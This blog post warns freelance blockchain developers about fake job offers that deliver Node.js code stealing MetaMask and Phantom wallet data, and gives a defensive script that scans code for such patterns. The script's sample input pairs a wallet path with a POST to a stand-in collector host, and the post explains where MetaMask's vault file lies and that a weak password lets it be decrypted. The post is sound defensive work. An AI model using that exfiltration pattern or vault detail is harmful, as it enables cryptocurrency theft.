🚨 Warning for Freelance Blockchain Developers: Beware of a New Scam!
Freelance developers, especially those working on blockchain and cryptocurrency projects, need to be vigilant about a new scam spreading across popular freelancing platforms. This scam involves a malicious Node.js script that scans a user’s storage and exfiltrates sensitive data, including browser wallet caches from extensions like Phantom and MetaMask.
I got these offers personally from LinkedIn and Freelancer.com.
🛑 How the Scam Works
- Fake Job Offer:
  - The scam begins when a "client" contacts a developer on platforms like LinkedIn, Upwork, or Fiverr with a seemingly legitimate job offer.
- Malicious Code Delivery:
  - After some discussions, the scammer provides a JavaScript or Node.js script for the developer to integrate into their project.
- Hidden Malicious Payload:
  - The script contains hidden code that:
    - Scans Local Storage: Looks for files or caches from browser wallet extensions like Phantom and MetaMask.
    - Extracts Sensitive Data: Gathers private keys, wallet addresses, or other critical information.
    - Exfiltrates the Data: Sends the stolen information to a remote server controlled by the scammer.
💥 The Impact
This scam is particularly dangerous because it targets developers who often work with sensitive financial data. By compromising a developer’s local environment, the scammer gains access to:
- Cryptocurrency wallets.
- Login credentials.
- Other critical information stored on the system.
For developers using browser wallet extensions like Phantom and MetaMask, the consequences can be severe. Losing access to these wallets often results in substantial financial losses.
🛡️ How to Protect Yourself
Take these precautions to avoid falling victim to this scam:
- Thoroughly Review Client Requests:
  - Scrutinize any code provided by clients, especially if it accesses or manipulates local storage.
  - If you don’t fully understand the code, seek advice from peers or use online resources to verify its legitimacy.
- Use Sandboxed Environments:
  - Run untrusted code in a sandboxed environment or a virtual machine to prevent it from accessing your main system’s storage.
- Implement Security Best Practices:
  - Stay informed about the latest security threats targeting developers by following cybersecurity blogs, forums, and news outlets.
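One way to do a first-pass review of client-supplied code, as an added example (not code from the original post): a small Node.js triage script that flags files combining wallet or filesystem access with outbound network calls. The rule set, the 500-character line threshold and the sample snippet are assumptions made for illustration, and a clean result does not prove the code is safe.

```javascript
// Added example: static triage of client-supplied code before anything is run.
// Rule names, patterns and thresholds are illustrative assumptions, not a full detector.
const fs = require('fs');
const path = require('path');

const RULES = [
  { id: 'wallet-ref', re: /metamask|phantom|\.ldb\b/i },
  { id: 'fs-scan', re: /\b(readdir|readFile|createReadStream)(Sync)?\b|os\.homedir\(|process\.env\.(APPDATA|LOCALAPPDATA|HOME)\b/ },
  { id: 'network', re: /\b(https?\.request|fetch\(|axios|XMLHttpRequest|net\.connect)/ },
  { id: 'dynamic-exec', re: /\beval\(|new Function\(|child_process|Buffer\.from\([^)]*['"]base64['"]/ },
];
const MAX_LINE = 500; // assumption: hand-written source rarely has lines this long

// Constructed sample input (not taken from any real project); it is only scanned, never executed.
const SAMPLE = [
  "const os = require('os');",
  "const dir = path.join(os.homedir(), 'ExampleBrowser', 'metamask');",
  "fetch('https://collector.example/upload', { method: 'POST', body: data });",
].join('\n');

function scanSource(text) {
  const hits = [];
  text.split(/\r?\n/).forEach((line, i) => {
    for (const r of RULES) if (r.re.test(line)) hits.push({ rule: r.id, line: i + 1 });
    if (line.length > MAX_LINE) hits.push({ rule: 'long-line', line: i + 1 });
  });
  return hits;
}

// Wallet or filesystem access combined with network traffic is the pattern this post describes.
function verdict(hits) {
  const seen = new Set(hits.map((h) => h.rule));
  const reads = seen.has('wallet-ref') || seen.has('fs-scan');
  if (reads && seen.has('network')) return 'block';
  return seen.size ? 'review' : 'clean';
}

// Walk a checkout and report every source file that triggered at least one rule.
function scanTree(dir, out = {}) {
  for (const e of fs.readdirSync(dir, { withFileTypes: true })) {
    const p = path.join(dir, e.name);
    if (e.isDirectory()) { if (e.name !== '.git') scanTree(p, out); }
    else if (/\.(c|m)?js$|\.ts$|\.json$/.test(e.name)) {
      const hits = scanSource(fs.readFileSync(p, 'utf8'));
      if (hits.length) out[p] = { verdict: verdict(hits), hits };
    }
  }
  return out;
}
```

Call `scanTree` on the fresh checkout inside the VM or container, before installing dependencies or starting the project, and read every flagged line by hand.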
📊 What the Hacker Gets
Here’s an example of the kind of data a hacker can extract:
In the MetaMask folder shown in the image above, for example, you’ll find a file named 000005.ldb or something similar. The exact number may vary, but it should be a low numerical value, such as 000004 or 000005. If the number is significantly higher, it is not the vault.
The hacker could decrypt that file if you’re not using a strong encryption password, potentially gaining access to your seed phrase—and as a result, you could lose your funds.
🔒 Conclusion
Do not run untrusted scripts on your main OS. Always use a virtual machine or Docker container with limited permissions to test potentially malicious code.
By staying vigilant and adopting secure practices, you can safeguard yourself and your projects from these scams. Stay safe! 🚀
Top comments (2)
Thanks for sharing this valuable article.
Yeah, you are right.
Nowadays there is a rise of scam projects on Upwork, Freelancer, and LinkedIn.
They camouflage themselves as an HR manager or CEO, give you GitHub or GitLab projects (mostly GitLab), and say it's part of the hiring process.
They wanted to run the project locally and record videos.
In their code, especially backend code, there is an external API call to access all the files on drive C.
They were trying to find secret keys or passwords, something like that.
So we need to be aware of that.
In that sense, I think this article will be valuable for us.
Thanks again
I have also faced the same scammers.
Thanks for sharing the article.